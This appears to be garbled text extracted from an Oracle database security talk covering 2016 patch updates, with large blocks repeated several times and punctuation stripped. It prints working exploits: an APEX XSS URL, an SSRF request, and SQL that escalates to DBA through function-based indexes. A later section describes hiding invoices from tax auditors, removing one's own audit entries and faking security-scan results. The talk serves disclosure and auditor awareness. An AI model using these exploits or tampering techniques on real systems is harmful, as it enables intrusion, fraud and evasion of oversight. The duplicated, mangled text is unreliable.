1 Data Pump (CVSS 67)
2 APEX (CVSS 61 58 2 remote)
1 RDBMS Security (CVSS 53 remote)
DB Shardening (CVSS 44)
1 Database Vault (CVSS 34)
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
Jul 2016 CPU- CVE-2016-3448
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem The HTMLDB_UTIL PLSQL package is
vulnerable to a XSS flaw To access it the
schema (APEX_050000) needs to be specified
first however because the config file whitelists
apex
Reporter David Litchfield
Exploit
httpexamplecomordsapex_050000htmldb_utilJSON_FROM_ARRAYP_COLS=1ampP_NAM E01=XX223E3CH13EOops3CH13EampP_F01=YampP_ROWS=1
Jul 2016 CPU- CVE-2016-3467
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem Apex 5 is vulnerable to a server side
request forgery flaw ie it can be made to connect
to another web server and port regardless of
whether allowed URLs have been configured For
example the request below will connect to
someotherserver on port and POST X as a payload
This can be used as a port scanning mechanism
used to attack systems protected by a firewall etc
Reporter David Litchfield
Exploit
httpexampleordsapex_050000WWV_FLOW_WEBSERVICES_APIMAKE_REQUESTP_U RL=httpsomeotherserverportampp_envelope=X
Apr 2016 CPU- CVE-2016-3488Problem Package dbms_gsm_common allows
to change database parameter without the
admin privileges and restart
Reporter Bruno Cirone
Exploit
exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE)
Jul 2016 CPU- CVE-2016-3488mdash as SYS SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY FALSE -- as user GSMUSER SQLgt exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE) PLSQL-Prozedur erfolgreich abgeschlossen -- as user SYS -Re-Run again after execution of the package SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU- CVE-2016-3484
Problem SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter Alexander Kornbrust
Problem (Details + Exploit laterhellip)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
July 2016 CPU- CVE-2016-3489
Problem Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter Alexander Kornbrust
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
May 2016
Nothing special happened
June 2016
Nothing special happened
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016 CPU
9 security fixes (5 remote exploitable)
1 OJVM (CVSS 90)
1 JDBC (CVSS 81 remote)
1 Portable Clusterware (CVSS 75 remote)
1 Data Pump (CVSS 67)
2 APEX (CVSS 61 58 2 remote)
1 RDBMS Security (CVSS 53 remote)
DB Shardening (CVSS 44)
1 Database Vault (CVSS 34)
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
Jul 2016 CPU- CVE-2016-3448
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem The HTMLDB_UTIL PLSQL package is
vulnerable to a XSS flaw To access it the
schema (APEX_050000) needs to be specified
first however because the config file whitelists
apex
Reporter David Litchfield
Exploit
httpexamplecomordsapex_050000htmldb_utilJSON_FROM_ARRAYP_COLS=1ampP_NAM E01=XX223E3CH13EOops3CH13EampP_F01=YampP_ROWS=1
Jul 2016 CPU- CVE-2016-3467
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem Apex 5 is vulnerable to a server side
request forgery flaw ie it can be made to connect
to another web server and port regardless of
whether allowed URLs have been configured For
example the request below will connect to
someotherserver on port and POST X as a payload
This can be used as a port scanning mechanism
used to attack systems protected by a firewall etc
Reporter David Litchfield
Exploit
httpexampleordsapex_050000WWV_FLOW_WEBSERVICES_APIMAKE_REQUESTP_U RL=httpsomeotherserverportampp_envelope=X
Apr 2016 CPU- CVE-2016-3488Problem Package dbms_gsm_common allows
to change database parameter without the
admin privileges and restart
Reporter Bruno Cirone
Exploit
exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE)
Jul 2016 CPU- CVE-2016-3488mdash as SYS SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY FALSE -- as user GSMUSER SQLgt exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE) PLSQL-Prozedur erfolgreich abgeschlossen -- as user SYS -Re-Run again after execution of the package SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU- CVE-2016-3484
Problem SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter Alexander Kornbrust
Problem (Details + Exploit laterhellip)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
July 2016 CPU- CVE-2016-3489
Problem Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter Alexander Kornbrust
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
June 2016
Nothing special happened
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016 CPU
9 security fixes (5 remote exploitable)
1 OJVM (CVSS 90)
1 JDBC (CVSS 81 remote)
1 Portable Clusterware (CVSS 75 remote)
1 Data Pump (CVSS 67)
2 APEX (CVSS 61 58 2 remote)
1 RDBMS Security (CVSS 53 remote)
DB Shardening (CVSS 44)
1 Database Vault (CVSS 34)
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
Jul 2016 CPU- CVE-2016-3448
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem The HTMLDB_UTIL PLSQL package is
vulnerable to a XSS flaw To access it the
schema (APEX_050000) needs to be specified
first however because the config file whitelists
apex
Reporter David Litchfield
Exploit
httpexamplecomordsapex_050000htmldb_utilJSON_FROM_ARRAYP_COLS=1ampP_NAM E01=XX223E3CH13EOops3CH13EampP_F01=YampP_ROWS=1
Jul 2016 CPU- CVE-2016-3467
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem Apex 5 is vulnerable to a server side
request forgery flaw ie it can be made to connect
to another web server and port regardless of
whether allowed URLs have been configured For
example the request below will connect to
someotherserver on port and POST X as a payload
This can be used as a port scanning mechanism
used to attack systems protected by a firewall etc
Reporter David Litchfield
Exploit
httpexampleordsapex_050000WWV_FLOW_WEBSERVICES_APIMAKE_REQUESTP_U RL=httpsomeotherserverportampp_envelope=X
Apr 2016 CPU- CVE-2016-3488Problem Package dbms_gsm_common allows
to change database parameter without the
admin privileges and restart
Reporter Bruno Cirone
Exploit
exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE)
Jul 2016 CPU- CVE-2016-3488mdash as SYS SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY FALSE -- as user GSMUSER SQLgt exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE) PLSQL-Prozedur erfolgreich abgeschlossen -- as user SYS -Re-Run again after execution of the package SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU- CVE-2016-3484
Problem SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter Alexander Kornbrust
Problem (Details + Exploit laterhellip)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
July 2016 CPU- CVE-2016-3489
Problem Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter Alexander Kornbrust
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
